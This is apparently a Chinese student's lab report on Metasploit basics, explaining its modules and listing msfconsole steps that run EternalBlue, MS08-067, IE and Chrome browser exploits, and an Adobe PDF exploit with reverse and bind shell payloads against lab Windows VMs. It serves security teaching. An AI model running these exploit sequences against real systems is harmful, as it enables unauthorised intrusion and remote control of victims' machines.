Exp6 MSF应用基础

一、实验原理

(1)MSF简介

Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。

(2)程序特点

这种可以扩展的模型将负载控制,编码器,无操作生成器和漏洞整合在一起,使 Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的 shellcode ,并且不断更新。最新版本的 MSF 包含了750多种流行的操作系统及应用软件的漏洞,以及224个 shellcode 。作为安全工具,它在安全检测中有着不容忽视的作用,并为漏洞自动化探测和及时检测系统漏洞提供了有力保障。

(3)七大模块

进入/usr/share/metasploit-framework/modules/exploits即可看到7个模块,其中evasion是在msf5中更新的,信息比较少

  • Exploit模块

是利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以植入和运行攻击载荷,从而获得对远程目标系统访问权的代码组件,形象的说就是攻击模块。

  • Payload模块

是在渗透成功后促使目标系统运行的一端植入代码,通常作用是为渗透攻击者打开在目标系统上的控制会话连接。实际上,该模块就是计算机集成的针对不同操作系统实现shellcode攻击的ruby代码。

  • Encoder模块

针对payload进行编码,可以通过多种编码手段、多次编码方式有效的改变payload代码特征。Encoder不改变payload作用,但能对payload进行加工。

  • Aux模块

能够帮助渗透测试中在进行渗透攻击之前得到的目标系统丰富的情报信息,从而发起更具目标性的精准攻击。主要包括针对各种网络服务的扫描和查点、构建虚假服务收集登录密码、口令猜测破解、敏感信息嗅探、探查敏感信息泄露、Fuzz测试发掘漏洞、实施网络协议欺骗等模块。

  • Post模块

支持在渗透攻击取得目标系统远程控制权之后,在受控系统中进行给各样的后渗透攻击动作。

  • Nops模块

是一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令,最典型的空指令就是空操作,在X86 CPU体系架构平台上的操作码是0x90 因为有些代码返回地址很难确认,所以在实际中有时候会填充一大段空指令,便于快速确定返回地址的位置。

  • evasion模块

对攻击载荷进行”免杀”处理。

(4)常用命令

  • search name :用指定关键字搜索可以利用的漏洞模块
  • use exploit name :使用漏洞
  • show options :显示配置选项
  • set TARGET target number :设置目标版本
  • exploit :开始漏洞攻击
  • sessions -l :列出会话
  • sessions -i id :选择会话
  • sessions -k id :结束会话
  • Ctrl+z :把会话放到后台
  • Ctrl+c :结束会话

参考链接:https://zhuanlan.zhihu.com/p/387455070

 

二、基础问题回答

用自己的话解释什么是exploit,payload,encode。

  • exploit是载具,连接漏洞,将payload传送到靶机中。
  • payload是载荷,是exploit中shellcode中的主要功能代码,exploit把它送到靶机中后,是真正负责进行攻击代码。
  • encode是编码,用来改变payload,避免payload中出现漏洞无法处理的字符;其次是为了实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。

三、实验过程

(0)准备工作

①靶机下载

(win7太高版本的可能会报错)

win7迅雷下载链接:ed2k://|file|en_windows_7_ultimate_with_sp1_x64_dvd_u_677332.iso|3320903680|743598C64E635C72964CF02A3E0AD547|/

windows XP迅雷下载链接:

ed2k://|file|en_windows_xp_home_with_service_pack_3_x86_cd_x14-92413.iso|592154624|E31A555C0AB581B8610583D2D25E93BD|/

win7安装配置:https://blog.csdn.net/m0_63207326/article/details/126003875

windows XP安装配置:https://blog.csdn.net/sunyisong090630/article/details/126335463

镜像下载网站:https://msdn.itellyou.cn/

②关闭靶机防火墙

③打开445端口

④查看靶机IP地址

 ⑤chrome下载

下载链接:https://dl.lancdn.com/landian/soft/chrome/m/old-version/

(1)主动攻击实践

查看版本

msfconsole

search scanner/smb/smb_

use 7

show options

set rhosts 192.168.253.136

run

查找对应利用漏洞模块 

search exploit/windows/smb/

第19条攻击方式:ms17-010(win7)

查看靶机该漏洞:nmap -sS -A --script=smb-vuln-ms17-010 -PO 192.168.253.136

选择对应MSF板块,设置靶机ip地址,执行攻击:

use exploit/windows/smb/ms17_010_eternalblue

set rhost 192.168.253.136

exploit

测试攻击:ipconfig

 第15条攻击方式:ms08_067(XP系统)

msfconsole

search ms08_067//查找该漏洞使用的攻击模块

use exploit/windows/smb/ms08_067_netapi//进入攻击模块

show payloads

set payload generic/shell_reverse_tcp //设置payload为反向tcp连接

set RHOST 192.168.253.138//设置靶机IP (winxp ip)

set LPORT 1202 //设置攻击机端口

set LHOST 192.168.253.132//设置攻击机IP (kali ip)

exploit

(2) 针对浏览器的攻击

查找对应利用漏洞模块

search exploit/windows/smb/

 第117条攻击方式:ms10_018_ie_behaviors(win7)

use exploit/windows/browser/ms10_018_ie_behaviors

set payload windows/meterpreter/bind_tcp

set RHOST 192.168.253.136

set target 0

exploit

使用win7的IE浏览器访问http://192.168.253.132:8080/kyryAWcN8JQ

 输入该网址会报错,其他网页都可以正常打开

 第50条攻击方式:chrome_filereader_uaf(win7)

use exploit/windows/browser/chrome_filereader_uaf

set payload windows/meterpreter/reverse_tcp

set URIPATH /

set LHOST 192.168.48.130

exploit

靶机端在浏览器安装目录的文件夹开cmd输入C:\Program Files\Google\Chrome\Application>chrome.exe --no-sandbox以沙箱关闭的状态执行chrome.exe,在地址栏输入地址http://192.168.253.136:8080

(3)针对客户端的攻击

攻击方式:Adobe(adobe_cooltype_sing) (XP)

攻击原理:https://www.likecs.com/show-305616517.html

msfconsole //进入控制台

search adobe //进行查找

use windows/fileformat/adobe_cooltype_sing //使用漏洞

info //查看漏洞具体信息

set payload windows/meterpreter/bind_tcp //选择攻击载荷

show options //查看详细信息

set LPORT 1202//设置端口号

set RHOST 192.168.253.138//设置靶机IP地址

exploit #攻击

将生成的msf文件复制到xp中,点击回连

(可以使用cp命令将文件复制到桌面再移动,也可以使用超级用户权限进入root)

use exploit/multi/handler //进入监听模块

set payload windows/meterpreter/bind_tcp //选择攻击载荷

show options //查看详细信息

set RHOST 192.168.253.138 //设置靶机IP地址

set LPORT 1202 //设置端口号

exploit //攻击

 

(4)成功应用任何一个辅助模块

使用PortScan进行端口扫描

use auxiliary/scanner/portscan/tcp

show options

set rhosts 192.168.253.136

exploit

 

四、实验总结

离实战还缺些什么技术或步骤?

①在攻击过程中,无论是针对客户端还是浏览器,都需要被攻击者打开所需的网址和客户端,在实际攻击中这部分则需要利用社会工程学手段,诱导被攻击者打开我们想要他打开的网址和客户端,突破信息安全防御措施。

②为了使实验能够成功,我们选择的靶机版本都比较古老,也就更易于攻击,对于新的安全性更强的靶机需要进一步的探索。

③对靶机的版本漏洞的理解要求特别高,不管是系统版本还是软件的版本,如何找到靶机存在的未修复漏洞都是攻击重点。

问题及解决

问题一:win7虚拟机启动时提示operating system not found

原因1:系统引导错误,找不到应该安装的盘符。

原因2:现在比较新的系统镜像(.iso)中的引导有问题(我的应该是这个,大家下载的时候可以注意不要下太新版本的qwq)。

原因3:磁盘未分区格式化。

参考:https://blog.csdn.net/ytgytg28/article/details/122192235

最直接的方式是换一个镜像。

问题二:ms08_067攻击方式渗透成功但会话未创建

Exploit completed, but no session was created.

原因1:如果未设置targets,Metaexploit会使用默认的Exploit Target 0

原因2:xp系统为中文版

参考:https://blog.csdn.net/qq_42430737/article/details/106746682

问题三:Adobe(adobe_cooltype_sing) 攻击方式攻击后不能获得主机连接

原因:这个漏洞针对Adobe阅读器9.3.4之前的版本,一个名为SING表对象中一个名为uniqueName的参数造成缓冲区溢出。

攻击原理:https://www.likecs.com/show-305616517.html

posted @ 2023-04-19 16:08  20201202史婧怡  阅读(291)  评论(0编辑  收藏  举报